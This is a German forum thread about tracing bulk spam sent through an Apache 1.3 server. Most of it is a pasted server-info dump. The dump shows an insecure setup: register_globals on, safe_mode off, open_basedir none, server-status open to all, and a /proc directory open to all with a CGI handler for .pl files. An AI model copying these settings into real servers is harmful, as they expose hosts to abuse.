spam über apache

[greenrover]

Hallo erstmal,

ich bekomme andauernd spam über den apache rein... (pro stoß a 12 000 mails)

Das system sit ein 1.3 er apache mit mod_php mod_cgi (perl) und frontpage

es wird nicht einfachso über ein formular verschickt (es lassen siche keinen große prozessanzahl in dne logs ausmachen)

es ist definitv der apache, die atcken lass sich due httpd stop sleep(5) httpd start unterbrechen.

Wenn es einam abgebroche nwurde laüft es NICHT weiter.


Also vermute ich irgent wo einen schleiffe in PHP die das ganze verschickt.....


nun zur Frage ..... wie kann ich die ursache genau lokaliesieren....
und den accesslogs kann ch einfach nichts festellen und domain.com/server-status hilft mri auch nicht weiter...

[Joe User]

mod_proxy geladen/einkompiliert?

[timeless2]

Benutz mal die Suchfunktion, da gibt es Codeschnipsel um verdächtige Skripts ausfindig zu machen bzw. /usr/sbin/sendmail zu modifizieren, worüber sich das Skript identifizieren lässt.

[greenrover]

@ Joe der mod wird geladennn... (wozu diehnt der überhaupt ?!)

@ timeless2 kannst du mir auch noch stichworte sagen wonach ich suchen soll ?!


Die server info:

Code: Select all

Apache Server Information
Server Settings, mod_jserv.c, mod_userdir.c, mod_ssl.c, mod_php4.c, mod_frontpage.c, mod_setenvif.c, mod_so.c, mod_usertrack.c, mod_headers.c, mod_expires.c, mod_cern_meta.c, mod_proxy.c, mod_digest.c, mod_auth_db.c, mod_auth_dbm.c, mod_auth_anon.c, mod_auth.c, mod_access.c, mod_rewrite.c, mod_alias.c, mod_speling.c, mod_actions.c, mod_imap.c, mod_asis.c, mod_cgi.c, mod_dir.c, mod_autoindex.c, mod_include.c, mod_info.c, mod_status.c, mod_negotiation.c, mod_mime.c, mod_mime_magic.c, mod_log_referer.c, mod_log_agent.c, mod_log_config.c, mod_define.c, mod_env.c, mod_vhost_alias.c, mod_mmap_static.c, http_core.cServer Version: Apache/1.3.33 (Linux/SuSE) ApacheJServ/1.1.2 mod_ssl/2.8.22 OpenSSL/0.9.7b FrontPage/4.0.4.3
Server Built: Jan 5 2005 19:25:54
API Version: 19990320:16
Run Mode: standalone
User/Group: wwwrun(30)/8
Hostname/port: jenny.movetec.ch:80
Daemons: start: 50    min idle: 10    max idle: 20    max: 150
Max Requests: per child: 0    keep alive: on    max per connection: 100
Threads: per child: 0   
Excess requests: per child: 0   
Timeouts: connection: 300    keep-alive: 15
Server Root: /srv/www
Config File: /etc/httpd/httpd.conf
PID File: /var/run/httpd.pid
Scoreboard File: /var/run/httpd.scoreboard

Module Name: mod_jserv.c
Content handlers: jserv-servlet , jserv-status , jserv-action
Configuration Phase Participation: Child Init, Create Server Config, Merge Server Configs
Request Phase Participation: Translate Path, Check Type
Module Directives:
    ApJServManual - Whether Apache JServ is running in manual or automatic mode. 
    ApJServProperties - The full pathname of jserv.properties file. 
    ApJServDefaultProtocol - The default protocol used for connecting to Apache JServ. 
    ApJServDefaultHost - The default host running Apache JServ. 
    ApJServDefaultPort - The default port on which Apache JServ is running on. 
    ApJServMount - Where Apache JServ servlets will be mounted under Apache. 
    ApJServMountCopy - Whether inherits base host mount points or not. 
    ApJServLogFile - Apache JServ log file relative to Apache root directory. 
    ApJServLogLevel - Apache JServ log verbosity. 
    ApJServSecretKey - Apache JServ secret key file relative to Apache root directory. 
    ApJServProtocolParameter - Apache JServ protocol-dependant property. 
    ApJServAction - Apache JServ action mapping extension to servlets. 
    ApJServBalance - Apache JServ load-balancing server set. 
    ApJServHost - Apache JServ host definition. 
    ApJServRoute - Apache JServ host routing identifier. 
    ApJServShmFile - The full pathname of shared memory file. 
    ApJServRetryAttempts - Apache JServ: retry attempts (1s appart) before returning server error 
    ApJServVMTimeout - Apache JServ: the amount of time given for the JVM to start or stop 
    ApJServVMInterval - Apache JServ: the interval between 2 polls of the JVM 
    ApJServEnvVar - Apache JServ: protocol ajpv12 : env var to send to the server 
Current Configuration:
Module Name: mod_userdir.c
Content handlers: none
Configuration Phase Participation: Create Server Config
Request Phase Participation: Translate Path
Module Directives:
    UserDir - the public subdirectory in users' home directories, or 'disabled', or 'disabled username username...', or 'enabled username username...' 
Current Configuration:
Module Name: mod_ssl.c
Content handlers: mod_ssl:content-handler
Configuration Phase Participation: Child Init, Create Directory Config, Merge Directory Configs, Create Server Config, Merge Server Configs
Request Phase Participation: Post-Read Request, Translate Path, Check Access, Verify User ID, Verify User Access, Fixups
Module Directives:
    SSLMutex - SSL lock for handling internal mutual exclusions (`none', `file:/path/to/file') 
    SSLPassPhraseDialog - SSL dialog mechanism for the pass phrase query (`builtin', `exec:/path/to/program') 
    SSLSessionCache - SSL Session Cache storage (`none', `dbm:/path/to/file') 
    SSLRandomSeed - SSL Pseudo Random Number Generator (PRNG) seeding source (`startup|connect builtin|file:/path|exec:/path [bytes]') 
    SSLEngine - SSL switch for the protocol engine (`on', `off') 
    SSLCipherSuite - Colon-delimited list of permitted SSL Ciphers (`XXX:...:XXX' - see manual) 
    SSLCertificateFile - SSL Server Certificate file (`/path/to/file' - PEM or DER encoded) 
    SSLCertificateKeyFile - SSL Server Private Key file (`/path/to/file' - PEM or DER encoded) 
    SSLCertificateChainFile - SSL Server CA Certificate Chain file (`/path/to/file' - PEM encoded) 
    SSLCACertificatePath - SSL CA Certificate path (`/path/to/dir' - contains PEM encoded files) 
    SSLCACertificateFile - SSL CA Certificate file (`/path/to/file' - PEM encoded) 
    SSLCARevocationPath - SSL CA Certificate Revocation List (CRL) path (`/path/to/dir' - contains PEM encoded files) 
    SSLCARevocationFile - SSL CA Certificate Revocation List (CRL) file (`/path/to/file' - PEM encoded) 
    SSLVerifyClient - SSL Client verify type (`none', `optional', `require', `optional_no_ca') 
    SSLVerifyDepth - SSL Client verify depth (`N' - number of intermediate certificates) 
    SSLSessionCacheTimeout - SSL Session Cache object lifetime (`N' - number of seconds) 
    SSLLog - SSL logfile for SSL-related messages (`/path/to/file', `|/path/to/program') 
    SSLLogLevel - SSL logfile verbosity level (`none', `error', `warn', `info', `debug') 
    SSLProtocol - Enable or disable various SSL protocols(`[+-][SSLv2|SSLv3|TLSv1] ...' - see manual) 
    SSLOptions - Set one of more options to configure the SSL engine(`[+-]option[=value] ...' - see manual) 
    SSLRequireSSL - Require the SSL protocol for the per-directory context (no arguments) 
    SSLRequire - Require a boolean expresion to evaluate to true for granting access(arbitrary complex boolean expression - see manual) 
Current Configuration:
/etc/httpd/httpd.conf
    SSLPassPhraseDialog builtin
    SSLSessionCache shmcb:/var/lib/httpd/ssl_scache
    SSLSessionCacheTimeout 600
    SSLMutex sem
    SSLRandomSeed startup builtin
    SSLRandomSeed connect builtin
    SSLLog /var/log/httpd/ssl_engine_log
    SSLLogLevel info
    SSLEngine on
    SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv3:+EXP:+eNULL
    SSLCertificateFile /etc/httpd/ssl.crt/ssl_movetec_ch.crt
    SSLCertificateKeyFile /etc/httpd/ssl.key/ssl_movetec_ch.key
    SSLCACertificateFile /etc/httpd/ssl.ca/ssl_movetec_ch.ca
    SSLEngine on
    SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv3:+EXP:+eNULL
    SSLCertificateFile /etc/httpd/ssl.crt/ssl_softgate_ch.crt
    SSLCertificateKeyFile /etc/httpd/ssl.key/ssl_softgate_ch.key
    SSLCACertificateFile /etc/httpd/ssl.ca/ssl_softgate_ch.ca
Module Name: mod_php4.c
Content handlers: application/x-httpd-php , application/x-httpd-php-source , text/html
Configuration Phase Participation: Create Directory Config, Merge Directory Configs, Child Exit
Request Phase Participation: none
Module Directives:
    php_value - PHP Value Modifier 
    php_flag - PHP Flag Modifier 
    php_admin_value - PHP Value Modifier (Admin) 
    php_admin_flag - PHP Flag Modifier (Admin) 
Current Configuration:
/etc/httpd/httpd.conf
    php_admin_value open_basedir /srv/www/htdocs/web100/:/srv/www/htdocs/phpMyAdmin/:/srv/www/htdocs/confixx/html/gesperrt/
    php_admin_value upload_tmp_dir /srv/www/htdocs/web100/phptmp/
    php_admin_value safe_mode off
    php_admin_value open_basedir /srv/www/htdocs/web150/:/srv/www/htdocs/phpMyAdmin/:/srv/www/htdocs/confixx/html/gesperrt/
    php_admin_value upload_tmp_dir /srv/www/htdocs/web150/phptmp/
    php_admin_value safe_mode_exec_dir /srv/www/htdocs/confixx/bin
    php_admin_value upload_tmp_dir /srv/www/htdocs/confixx/tmp
    php_admin_value open_basedir none
    php_admin_value safe_mode off
    php_admin_value register_globals on
    php_admin_value open_basedir /srv/www/htdocs/web100/:/srv/www/htdocs/phpMyAdmin/:/srv/www/htdocs/confixx/html/gesperrt/
    php_admin_value upload_tmp_dir /srv/www/htdocs/web100/phptmp/
    php_admin_value safe_mode off
    php_value short_open_tag 1
    php_value register_globals 1
Module Name: mod_frontpage.c
Content handlers: application/x-httpd-frontpage
Configuration Phase Participation: Create Server Config, Merge Server Configs
Request Phase Participation: Translate Path
Module Directives:
    FrontPageDisable - Disable FrontPage 
    FrontPageEnable - Enable FrontPage 
Current Configuration:
Module Name: mod_setenvif.c
Content handlers: none
Configuration Phase Participation: Create Directory Config, Merge Directory Configs, Create Server Config, Merge Server Configs
Request Phase Participation: Post-Read Request, Header Parse
Module Directives:
    SetEnvIf - A header-name, regex and a list of variables. 
    SetEnvIfNoCase - a header-name, regex and a list of variables. 
    BrowserMatch - A browser regex and a list of variables. 
    BrowserMatchNoCase - A browser regex and a list of variables. 
Current Configuration:
/etc/httpd/httpd.conf
    BrowserMatch "Mozilla/2" nokeepalive
    BrowserMatch "MSIE 4.0b2;" nokeepalive downgrade-1.0 force-response-1.0
    BrowserMatch "RealPlayer 4.0" force-response-1.0
    BrowserMatch "Java/1.0" force-response-1.0
    BrowserMatch "JDK/1.0" force-response-1.0
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0
Module Name: mod_so.c
Content handlers: none
Configuration Phase Participation: Create Server Config
Request Phase Participation: none
Module Directives:
    LoadModule - a module name and the name of a shared object file to load it from 
    LoadFile - shared object file or library to load into the server at runtime 
Current Configuration:
/etc/httpd/httpd.conf
    LoadModule mmap_static_module /usr/lib/apache/mod_mmap_static.so
    LoadModule vhost_alias_module /usr/lib/apache/mod_vhost_alias.so
    LoadModule env_module /usr/lib/apache/mod_env.so
    LoadModule define_module /usr/lib/apache/mod_define.so
    LoadModule config_log_module /usr/lib/apache/mod_log_config.so
    LoadModule agent_log_module /usr/lib/apache/mod_log_agent.so
    LoadModule referer_log_module /usr/lib/apache/mod_log_referer.so
    LoadModule mime_magic_module /usr/lib/apache/mod_mime_magic.so
    LoadModule mime_module /usr/lib/apache/mod_mime.so
    LoadModule negotiation_module /usr/lib/apache/mod_negotiation.so
    LoadModule status_module /usr/lib/apache/mod_status.so
    LoadModule info_module /usr/lib/apache/mod_info.so
    LoadModule includes_module /usr/lib/apache/mod_include.so
    LoadModule autoindex_module /usr/lib/apache/mod_autoindex.so
    LoadModule dir_module /usr/lib/apache/mod_dir.so
    LoadModule cgi_module /usr/lib/apache/mod_cgi.so
    LoadModule asis_module /usr/lib/apache/mod_asis.so
    LoadModule imap_module /usr/lib/apache/mod_imap.so
    LoadModule action_module /usr/lib/apache/mod_actions.so
    LoadModule speling_module /usr/lib/apache/mod_speling.so
    LoadModule alias_module /usr/lib/apache/mod_alias.so
    LoadModule rewrite_module /usr/lib/apache/mod_rewrite.so
    LoadModule access_module /usr/lib/apache/mod_access.so
    LoadModule auth_module /usr/lib/apache/mod_auth.so
    LoadModule anon_auth_module /usr/lib/apache/mod_auth_anon.so
    LoadModule dbm_auth_module /usr/lib/apache/mod_auth_dbm.so
    LoadModule db_auth_module /usr/lib/apache/mod_auth_db.so
    LoadModule digest_module /usr/lib/apache/mod_digest.so
    LoadModule proxy_module /usr/lib/apache/libproxy.so
    LoadModule cern_meta_module /usr/lib/apache/mod_cern_meta.so
    LoadModule expires_module /usr/lib/apache/mod_expires.so
    LoadModule headers_module /usr/lib/apache/mod_headers.so
    LoadModule usertrack_module /usr/lib/apache/mod_usertrack.so
    LoadModule setenvif_module /usr/lib/apache/mod_setenvif.so
Module Name: mod_usertrack.c
Content handlers: none
Configuration Phase Participation: Create Directory Config, Create Server Config
Request Phase Participation: Fixups
Module Directives:
    CookieExpires - an expiry date code 
    CookieTracking - whether or not to enable cookies 
    CookieName - name of the tracking cookie 
    CookieDomain - domain to which this cookie applies 
    CookieStyle - 'Netscape', 'Cookie' (RFC2109), or 'Cookie2' (RFC2965) 
    CookieFormat - 'Normal' or 'Compact' 
    CookiePrefix - String prepended to cookie 
Current Configuration:
Module Name: mod_headers.c
Content handlers: none
Configuration Phase Participation: Create Directory Config, Merge Directory Configs, Create Server Config, Merge Server Configs
Request Phase Participation: Fixups
Module Directives:
    Header - an action, header and value 
    ErrorHeader - an action, header and value 
Current Configuration:
Module Name: mod_expires.c
Content handlers: none
Configuration Phase Participation: Create Directory Config, Merge Directory Configs
Request Phase Participation: Fixups
Module Directives:
    ExpiresActive - Limited to 'on' or 'off' 
    ExpiresBytype - a MIME type followed by an expiry date code 
    ExpiresDefault - an expiry date code 
Current Configuration:
Module Name: mod_cern_meta.c
Content handlers: none
Configuration Phase Participation: Create Directory Config, Merge Directory Configs
Request Phase Participation: Fixups
Module Directives:
    MetaFiles - Limited to 'on' or 'off' 
    MetaDir - the name of the directory containing meta files 
    MetaSuffix - the filename suffix for meta files 
Current Configuration:
Module Name: mod_proxy.c
Content handlers: proxy-server
Configuration Phase Participation: Create Server Config, Merge Server Configs
Request Phase Participation: Post-Read Request, Translate Path, Fixups
Module Directives:
    ProxyRequests - on if the true proxy requests should be accepted 
    ProxyRemote - a scheme, partial URL or '*' and a proxy server 
    ProxyPass - a virtual path and a URL 
    ProxyPassReverse - a virtual path and a URL for reverse proxy behaviour 
    ProxyBlock - A list of names, hosts or domains to which the proxy will not connect 
    ProxyReceiveBufferSize - Receive buffer size for outgoing HTTP and FTP connections in bytes 
    ProxyIOBufferSize - IO buffer size for outgoing HTTP and FTP connections in bytes 
    NoProxy - A list of domains, hosts, or subnets to which the proxy will connect directly 
    ProxyDomain - The default intranet domain name (in absence of a domain in the URL) 
    AllowCONNECT - A list of ports which CONNECT may connect to 
    CacheRoot - The directory to store cache files 
    CacheSize - The maximum disk space used by the cache in Kb 
    CacheMaxExpire - The maximum time in hours to cache a document 
    CacheDefaultExpire - The default time in hours to cache a document 
    CacheLastModifiedFactor - The factor used to estimate Expires date from LastModified date 
    CacheGcInterval - The interval between garbage collections, in hours 
    CacheDirLevels - The number of levels of subdirectories in the cache 
    CacheDirLength - The number of characters in subdirectory names 
    NoCache - A list of names, hosts or domains for which caching is *not* provided 
    CacheForceCompletion - Force a http cache completion after this percentage is loaded 
    ProxyVia - Configure Via: proxy header header to one of: on | off | block | full 
Current Configuration:
Module Name: mod_digest.c
Content handlers: none
Configuration Phase Participation: Create Directory Config
Request Phase Participation: Verify User ID, Verify User Access
Module Directives:
    AuthDigestFile - 
Current Configuration:
Module Name: mod_auth_db.c
Content handlers: none
Configuration Phase Participation: Create Directory Config
Request Phase Participation: Verify User ID, Verify User Access
Module Directives:
    AuthDBUserFile - 
    AuthDBGroupFile - 
    AuthUserFile - 
    AuthGroupFile - 
    AuthDBAuthoritative - Set to 'no' to allow access control to be passed along to lower modules if the userID is not known to this module 
Current Configuration:
/etc/httpd/httpd.conf
    <Directory /> 
      AuthUserFile /etc/httpd/passwd
      AuthGroupFile /etc/httpd/group
    </Directory> 
Module Name: mod_auth_dbm.c
Content handlers: none
Configuration Phase Participation: Create Directory Config
Request Phase Participation: Verify User ID, Verify User Access
Module Directives:
    AuthDBMUserFile - 
    AuthDBMGroupFile - 
    AuthUserFile - 
    AuthGroupFile - 
    AuthDBMAuthoritative - Set to 'no' to allow access control to be passed along to lower modules, if the UserID is not known in this module 
Current Configuration:
/etc/httpd/httpd.conf
    <Directory /> 
      AuthUserFile /etc/httpd/passwd
      AuthGroupFile /etc/httpd/group
    </Directory> 
Module Name: mod_auth_anon.c
Content handlers: none
Configuration Phase Participation: Create Directory Config
Request Phase Participation: Verify User ID, Verify User Access
Module Directives:
    Anonymous - a space-separated list of user IDs 
    Anonymous_MustGiveEmail - Limited to 'on' or 'off' 
    Anonymous_NoUserId - Limited to 'on' or 'off' 
    Anonymous_VerifyEmail - Limited to 'on' or 'off' 
    Anonymous_LogEmail - Limited to 'on' or 'off' 
    Anonymous_Authoritative - Limited to 'on' or 'off' 
Current Configuration:
Module Name: mod_auth.c
Content handlers: none
Configuration Phase Participation: Create Directory Config
Request Phase Participation: Verify User ID, Verify User Access
Module Directives:
    AuthUserFile - text file containing user IDs and passwords 
    AuthGroupFile - text file containing group names and member user IDs 
    AuthAuthoritative - Set to 'off' to allow access control to be passed along to lower modules if the UserID is not known to this module 
Current Configuration:
/etc/httpd/httpd.conf
    <Directory /> 
      AuthUserFile /etc/httpd/passwd
      AuthGroupFile /etc/httpd/group
    </Directory> 
Module Name: mod_access.c
Content handlers: none
Configuration Phase Participation: Create Directory Config
Request Phase Participation: Check Access
Module Directives:
    order - 'allow,deny', 'deny,allow', or 'mutual-failure' 
    allow - 'from' followed by hostnames or IP-address wildcards 
    deny - 'from' followed by hostnames or IP-address wildcards 
Current Configuration:
/etc/httpd/httpd.conf
    <Directory "/srv/www/htdocs"> 
      Order allow,deny
      Allow from all
    <Directory "/srv/www/htdocs"> 
      <Files test.php3> 
        Order deny,allow
        deny from all
        allow from localhost
      </Files> 
    </Directory> 
    <Files ~ "^.ht"> 
      Order allow,deny
      Deny from all
    </Files> 
    <Directory "/srv/www/icons"> 
      Order allow,deny
      Allow from all
    </Directory> 
    <Directory "/srv/www/htdocs/manual"> 
      Order allow,deny
      Allow from all
    </Directory> 
    <Directory "/srv/www/cgi-bin"> 
      Order allow,deny
      Allow from all
    </Directory> 
    <Location /server-status> 
      Order deny,allow
      Allow from localhost
      Allow from all
    </Location> 
    <Location /server-info> 
      Order deny,allow
      Allow from localhost
    </Location> 
    <Location /perl-status> 
      order deny,allow
      deny from all
      allow from localhost
    </Location> 
    <Directory "/srv/www/htdocs/confixx/html/user/awstats"> 
      <Files *.conf> 
        order deny,allow
        deny from all
      </Files> 
    <Directory "/srv/www/htdocs/confixx/html/user/awstats"> 
      <Files *.txt> 
        order deny,allow
        deny from all
      </Files> 
    </Directory> 
    <Directory "/proc"> 
      <Files *> 
        order allow,deny
        allow from all
      </Files> 
    </Directory> 
Module Name: mod_rewrite.c
Content handlers: redirect-handler
Configuration Phase Participation: Child Init, Create Directory Config, Merge Directory Configs, Create Server Config, Merge Server Configs
Request Phase Participation: Translate Path, Check Type, Fixups
Module Directives:
    RewriteEngine - On or Off to enable or disable (default) the whole rewriting engine 
    RewriteOptions - List of option strings to set 
    RewriteBase - the base URL of the per-directory context 
    RewriteCond - an input string and a to be applied regexp-pattern 
    RewriteRule - an URL-applied regexp-pattern and a substitution URL 
    RewriteMap - a mapname and a filename 
    RewriteLock - the filename of a lockfile used for inter-process synchronization 
    RewriteLog - the filename of the rewriting logfile 
    RewriteLogLevel - the level of the rewriting logfile verbosity (0=none, 1=std, .., 9=max) 
Current Configuration:
Module Name: mod_alias.c
Content handlers: none
Configuration Phase Participation: Create Directory Config, Merge Directory Configs, Create Server Config, Merge Server Configs
Request Phase Participation: Translate Path, Fixups
Module Directives:
    Alias - a fakename and a realname 
    ScriptAlias - a fakename and a realname 
    Redirect - an optional status, then document to be redirected and destination URL 
    AliasMatch - a regular expression and a filename 
    ScriptAliasMatch - a regular expression and a filename 
    RedirectMatch - an optional status, then a regular expression and destination URL 
    RedirectTemp - a document to be redirected, then the destination URL 
    RedirectPermanent - a document to be redirected, then the destination URL 
Current Configuration:
/etc/httpd/httpd.conf
    Alias /icons/ "/srv/www/icons/"
    Alias /manual/ "/srv/www/htdocs/manual/"
    ScriptAlias /cgi-bin/ "/srv/www/cgi-bin/"
    ScriptAlias /perl/ "/srv/www/cgi-bin/"
    ScriptAlias /cgi-perl/ "/srv/www/cgi-bin/"
    ScriptAlias /cgi-bin/ /srv/www/htdocs/web100/html/cgi-bin/
    ScriptAlias /cgi-bin/ /srv/www/htdocs/web150/html/cgi-bin/
    Alias /phpmyadmin /srv/www/htdocs/phpMyAdmin
    ScriptAlias /cgi-bin/ /srv/www/htdocs/confixx/html/cgi-bin/
    ScriptAlias /cgi-bin/ /srv/www/htdocs/web100/html/cgi-bin/
Module Name: mod_speling.c
Content handlers: none
Configuration Phase Participation: Create Directory Config, Create Server Config
Request Phase Participation: Fixups
Module Directives:
    CheckSpelling - whether or not to fix miscapitalized/misspelled requests 
Current Configuration:
Module Name: mod_actions.c
Content handlers: */*
Configuration Phase Participation: Create Directory Config, Merge Directory Configs
Request Phase Participation: none
Module Directives:
    Action - a media type followed by a script name 
    Script - a method followed by a script name 
Current Configuration:
Module Name: mod_imap.c
Content handlers: application/x-httpd-imap , imap-file
Configuration Phase Participation: Create Directory Config, Merge Directory Configs
Request Phase Participation: none
Module Directives:
    ImapMenu - the type of menu generated: none, formatted, semiformatted, unformatted 
    ImapDefault - the action taken if no match: error, nocontent, referer, menu, URL 
    ImapBase - the base for all URL's: map, referer, URL (or start of) 
Current Configuration:
Module Name: mod_asis.c
Content handlers: httpd/send-as-is , send-as-is
Configuration Phase Participation: none
Request Phase Participation: none
Module Directives: none
Module Name: mod_cgi.c
Content handlers: application/x-httpd-cgi , cgi-script
Configuration Phase Participation: Create Server Config, Merge Server Configs
Request Phase Participation: none
Module Directives:
    ScriptLog - the name of a log for script debugging info 
    ScriptLogLength - the maximum length (in bytes) of the script debug log 
    ScriptLogBuffer - the maximum size (in bytes) to record of a POST request 
Current Configuration:
Module Name: mod_dir.c
Content handlers: httpd/unix-directory
Configuration Phase Participation: Create Directory Config, Merge Directory Configs
Request Phase Participation: none
Module Directives:
    DirectoryIndex - a list of file names 
Current Configuration:
/etc/httpd/httpd.conf
    <Directory "/srv/www/htdocs/*/html/"> 
      DirectoryIndex index.htm index.html index.php3 index.php index.pl index.cgi index.asp index.shtml home.htm home.html home.php home.shtml home.asp home.php3 home.cgi home.pl default.htm default.html default.php default.shtml default.asp default.php3 default.cgi default.pl
    </Directory> 
Module Name: mod_autoindex.c
Content handlers: httpd/unix-directory
Configuration Phase Participation: Create Directory Config, Merge Directory Configs
Request Phase Participation: none
Module Directives:
    AddIcon - an icon URL followed by one or more filenames 
    AddIconByType - an icon URL followed by one or more MIME types 
    AddIconByEncoding - an icon URL followed by one or more content encodings 
    AddAlt - alternate descriptive text followed by one or more filenames 
    AddAltByType - alternate descriptive text followed by one or more MIME types 
    AddAltByEncoding - alternate descriptive text followed by one or more content encodings 
    IndexOptions - one or more index options 
    IndexOrderDefault - {Ascending,Descending} {Name,Size,Description,Date} 
    IndexIgnore - one or more file extensions 
    AddDescription - Descriptive text followed by one or more filenames 
    HeaderName - a filename 
    ReadmeName - a filename 
    FancyIndexing - Limited to 'on' or 'off' (superseded by IndexOptions FancyIndexing) 
    DefaultIcon - an icon URL 
Current Configuration:
/etc/httpd/httpd.conf
    IndexOptions FancyIndexing
    AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip
    AddIconByType (TXT,/icons/text.gif) text/*
    AddIconByType (IMG,/icons/image2.gif) image/*
    AddIconByType (SND,/icons/sound2.gif) audio/*
    AddIconByType (VID,/icons/movie.gif) video/*
    AddIcon /icons/binary.gif .bin .exe
    AddIcon /icons/binhex.gif .hqx
    AddIcon /icons/tar.gif .tar
    AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv
    AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip
    AddIcon /icons/a.gif .ps .ai .eps
    AddIcon /icons/layout.gif .html .shtml .htm .pdf
    AddIcon /icons/text.gif .txt
    AddIcon /icons/c.gif .c
    AddIcon /icons/p.gif .pl .py
    AddIcon /icons/f.gif .for
    AddIcon /icons/dvi.gif .dvi
    AddIcon /icons/uuencoded.gif .uu
    AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl
    AddIcon /icons/tex.gif .tex
    AddIcon /icons/bomb.gif core
    AddIcon /icons/back.gif ..
    AddIcon /icons/hand.right.gif README
    AddIcon /icons/folder.gif ^^DIRECTORY^^
    AddIcon /icons/blank.gif ^^BLANKICON^^
    DefaultIcon /icons/unknown.gif
    AddDescription "GZIP compressed document" .gz
    AddDescription "tar archive" .tar
    AddDescription "GZIP compressed tar archive" .tgz
    ReadmeName README
    HeaderName HEADER
    IndexIgnore .??* *~ *# RCS CVS *,v *,t
Module Name: mod_include.c
Content handlers: text/x-server-parsed-html , text/x-server-parsed-html3 , server-parsed , text/html
Configuration Phase Participation: Create Directory Config
Request Phase Participation: none
Module Directives:
    XBitHack - Off, On, or Full 
Current Configuration:
/etc/httpd/httpd.conf
    XBitHack On
Module Name: mod_info.c
Content handlers: server-info
Configuration Phase Participation: Create Server Config, Merge Server Configs
Request Phase Participation: none
Module Directives:
    AddModuleInfo - a module name and additional information on that module 
Current Configuration:
Module Name: mod_status.c
Content handlers: application/x-httpd-status , server-status
Configuration Phase Participation: none
Request Phase Participation: none
Module Directives:
    ExtendedStatus - "On" to enable extended status information, "Off" to disable 
Current Configuration:
/etc/httpd/httpd.conf
    ExtendedStatus On
Module Name: mod_negotiation.c
Content handlers: application/x-type-map , type-map
Configuration Phase Participation: Create Directory Config, Merge Directory Configs
Request Phase Participation: Check Type, Fixups
Module Directives:
    CacheNegotiatedDocs - no arguments (either present or absent) 
    LanguagePriority - space-delimited list of MIME language abbreviations 
Current Configuration:
/etc/httpd/httpd.conf
    LanguagePriority en da nl et fr de el it ja kr no pl pt pt-br ru ltz ca es sv tw
Module Name: mod_mime.c
Content handlers: none
Configuration Phase Participation: Create Directory Config, Merge Directory Configs
Request Phase Participation: Check Type
Module Directives:
    AddType - a mime type followed by one or more file extensions 
    AddEncoding - an encoding (e.g., gzip), followed by one or more file extensions 
    AddCharset - a charset (e.g., iso-2022-jp), followed by one or more file extensions 
    AddLanguage - a language (e.g., fr), followed by one or more file extensions 
    AddHandler - a handler name followed by one or more file extensions 
    ForceType - a media type 
    RemoveHandler - one or more file extensions 
    RemoveEncoding - one or more file extensions 
    RemoveType - one or more file extensions 
    SetHandler - a handler name 
    TypesConfig - the MIME types config file 
    DefaultLanguage - language to use for documents with no other language file extension 
Current Configuration:
/etc/httpd/httpd.conf
    TypesConfig /etc/httpd/mime.types
    <Location "/backhand/"> 
      SetHandler backhand-handler
    </Location> 
    <Location /cgi-bin> 
      SetHandler cgi-script
    </Location> 
    <Location /perl> 
      SetHandler perl-script
    </Location> 
    <Location /cgi-perl> 
      SetHandler perl-script
    </Location> 
    AddLanguage da .dk
    AddLanguage nl .nl
    AddLanguage en .en
    AddLanguage et .ee
    AddLanguage fr .fr
    AddLanguage de .de
    AddLanguage el .el
    AddLanguage he .he
    AddCharset ISO-8859-8 .iso8859-8
    AddLanguage it .it
    AddLanguage ja .ja
    AddCharset ISO-2022-JP .jis
    AddLanguage kr .kr
    AddCharset ISO-2022-KR .iso-kr
    AddLanguage nn .nn
    AddLanguage no .no
    AddLanguage pl .po
    AddCharset ISO-8859-2 .iso-pl
    AddLanguage pt .pt
    AddLanguage pt-br .pt-br
    AddLanguage ltz .lu
    AddLanguage ca .ca
    AddLanguage es .es
    AddLanguage sv .sv
    AddLanguage cs .cz .cs
    AddLanguage ru .ru
    AddLanguage zh-TW .zh-tw
    AddCharset Big5 .Big5 .big5
    AddCharset WINDOWS-1251 .cp-1251
    AddCharset CP866 .cp866
    AddCharset ISO-8859-5 .iso-ru
    AddCharset KOI8-R .koi8-r
    AddCharset UCS-2 .ucs2
    AddCharset UCS-4 .ucs4
    AddCharset UTF-8 .utf8
    AddType application/x-tar .tgz
    AddEncoding x-compress .Z
    AddEncoding x-gzip .gz .tgz
    AddType application/x-httpd-php3 .php3
    AddType application/x-httpd-php3-source .phps
    AddType application/x-httpd-php3 .phtml
    AddType application/x-httpd-php .php
    AddType application/x-httpd-php .php4
    AddType application/x-httpd-php-source .phps
    AddType application/x-httpd-php .html
    AddType application/x-httpd-tcl .ttml
    AddType application/x-dtcl-tcl .tcl
    AddType text/vnd.wap.wml wml
    AddType text/vnd.wap.wmlscript wmls
    AddType application/vnd.wap.wmlc wmlc
    AddType application/vnd.wap.wmlscriptc wmlsc
    Addtype image/vnd.wap.wbmp wbmp
    AddHandler cgi-script .cgi
    AddType text/html .shtml
    AddHandler server-parsed .shtml
    AddType text/html .asp
    AddHandler server-parsed .asp
    <Location /server-status> 
      SetHandler server-status
    </Location> 
    <Location /server-info> 
      SetHandler server-info
    </Location> 
    <Location /perl-status> 
      SetHandler perl-script
    </Location> 
    AddType application/x-x509-ca-cert .crt
    AddType application/x-pkcs7-crl .crl
    <Directory "/srv/www/htdocs/confixx/html/user/awstats"> 
      AddHandler cgi-script .pl
    </Directory> 
    <Directory "/proc"> 
      AddHandler cgi-script .pl
    </Directory> 
Module Name: mod_mime_magic.c
Content handlers: none
Configuration Phase Participation: Create Server Config, Merge Server Configs
Request Phase Participation: Check Type
Module Directives:
    MimeMagicFile - Path to MIME Magic file (in file(1) format) 
Current Configuration:
/etc/httpd/httpd.conf
    MIMEMagicFile /etc/httpd/magic
Module Name: mod_log_referer.c
Content handlers: none
Configuration Phase Participation: Create Server Config
Request Phase Participation: Logging
Module Directives:
    RefererLog - the filename of the referer log 
    RefererIgnore - referer hostnames to ignore 
Current Configuration:
Module Name: mod_log_agent.c
Content handlers: none
Configuration Phase Participation: Create Server Config
Request Phase Participation: Logging
